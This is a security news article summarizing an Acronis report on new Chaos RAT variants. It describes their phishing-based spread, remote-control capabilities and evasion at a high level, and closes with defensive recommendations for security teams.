The Acronis TRU research team has discovered new variants of Chaos RAT that are targeting both Linux and Windows systems in recent attacks. Although this malware was first spotted in 2022, it has evolved over time, and by 2024, more sophisticated versions began to emerge. Now, in 2025, new samples continue to surface.
Additionally, TRU identified a critical vulnerability in the web panel of this RAT that could allow an attacker to execute code remotely—a serious threat. One of the latest versions even tricks victims into downloading what appears to be a network troubleshooting tool for Linux, but is actually part of the attack. In other words, their infection methods are becoming increasingly convincing.
According to the Acronis report: "Developed in Golang, Chaos RAT operates on both Windows and Linux, and is a prime example of how seemingly useful tools can end up being exploited by cybercriminals for nefarious purposes."
They also note that although its overall usage is not yet widespread, the recent samples prove that Chaos RAT remains active. And the worst part is that it often goes undetected, making it ideal for espionage, data theft, or even as a launchpad for more severe attacks such as ransomware.
If you're not familiar with it, Chaos RAT is an open-source remote access tool written in Golang, designed to give attackers full control over compromised systems. It draws inspiration from well-known tools like Cobalt Strike and Sliver, and includes a panel from which malicious payloads can be generated, sessions managed, and infected machines controlled.
Although malware written in Go is typically heavier and somewhat slower than that written in C++, its major advantage lies in its adaptability across multiple platforms and the speed with which it can be developed. That flexibility is precisely what makes it so attractive to those looking to launch attacks with minimal effort.
What Is Chaos RAT?: From Legitimate Tool to Cyber Weapon
What began as a legitimate tool for remote system management has become a cybersecurity headache. Chaos RAT, being open-source, has been adopted and modified by various attacker groups for their own purposes. Although its development began around 2017, it wasn’t until late 2022 that it started being used actively in attacks—mainly targeting Linux systems in cryptocurrency mining campaigns.
Since then, its usage has only increased, and that should raise alarm bells: understanding how this RAT works, how it infiltrates systems, and how to defend against it is no longer optional.
How Does Chaos RAT Spread?
Typically, it arrives via phishing emails—the usual suspects: emails with links or attachments that appear harmless but hide unpleasant surprises. In its early campaigns, attackers used cron jobs (the Linux equivalent of scheduling automatic tasks) to keep updating the malware remotely without needing to re-enter the system. This allowed them to deploy a crypto miner or Chaos RAT itself and simply move on.
In many cases, the RAT was primarily used for system reconnaissance, gathering useful information before launching more aggressive attacks. For example, in a recent case in India, a file named NetworkAnalyzer.tar.gz was found containing Chaos RAT disguised as a harmless network diagnostic tool for Linux. This clearly shows that attackers are using social engineering to trick their victims.
Read more: New Attack with Atomic macOS Stealer Targeting Apple Users
What Can Chaos RAT Do?
Quite a lot, to be honest. It's a fairly comprehensive remote control tool. Among other capabilities, it can:
-
Gather system and user information
-
Take screenshots
-
Restart or shut down the machine
-
Lock or log off users (on Windows)
-
Browse files, upload, download, or delete them
-
Open URLs in the default browser
And it can do all this on both Windows and Linux systems, with some platform-specific functions. Essentially, it gives attackers full control of the infected device and free rein over any data they find.
Additionally, Chaos RAT enables remote file management, opening reverse shells (allowing command-line access to the victim’s machine), and creating network tunnels to hide traffic—ideal for spying, data theft, or even setting the stage for a ransomware attack.
Why Is It So Hard to Detect?
One of the main reasons is that it's open-source software. Anyone can take the code, tweak it, and release their own customized version. This means antivirus and other security solutions have a harder time identifying it, because each variant can look different even if it performs the same actions.
To make matters worse, Chaos RAT is written in Golang, a programming language that easily compiles cross-platform executables. Although Go-based programs tend to be larger and a bit slower than those written in other languages, they allow attackers to create versions for both Linux and Windows with minimal code changes. This speeds up the development and deployment of new variants.
Not Everything Open Source Is Good
As the Acronis report states: “A tool designed for developers can end up becoming a cybercriminal’s favorite toy.” And Chaos RAT is the perfect example. It features a simple web interface, offers full control over compromised systems, allows for remote command execution, file transfers, shell access, and much more.
In the wrong hands, open-source code becomes a weapon. Chaos RAT reminds us that what may be useful for legitimate system administration can also become a security nightmare when militarized.
Thanks to its ability to deploy quickly, target Linux systems without raising alarms, and easily adapt to different environments, Chaos RAT continues to grow as a silent yet powerful threat.
Read more: 8 Steps to Performing a Network Vulnerability Assessment
Security Recommendations for Defense Teams
If you’re part of a company’s security team, here are some practical tips to protect against Chaos RAT:
-
Block Known C2 Domains: Prevent the malware from communicating with the attackers’ servers by blocking known command-and-control domains associated with Chaos RAT.
-
Monitor Scheduled Tasks in Linux: Pay close attention to the
/etc/crontabfile. Suspicious or unexpected entries could be a sign that something’s wrong. -
Use Security Tools Like Application Whitelisting and EDR: These can detect Golang-based malicious payloads. This type of malware often slips through undetected because it doesn't always raise obvious red flags.
-
Train Users Not to Download Software from Unknown Sources: One click on the wrong file can open the door to an attacker.
-
Keep the Chaos RAT Panel Patched and Updated: If you use the Chaos RAT panel for testing or research (e.g., as part of a red team), ensure it is always properly patched and up to date. You don’t want it turning against you.
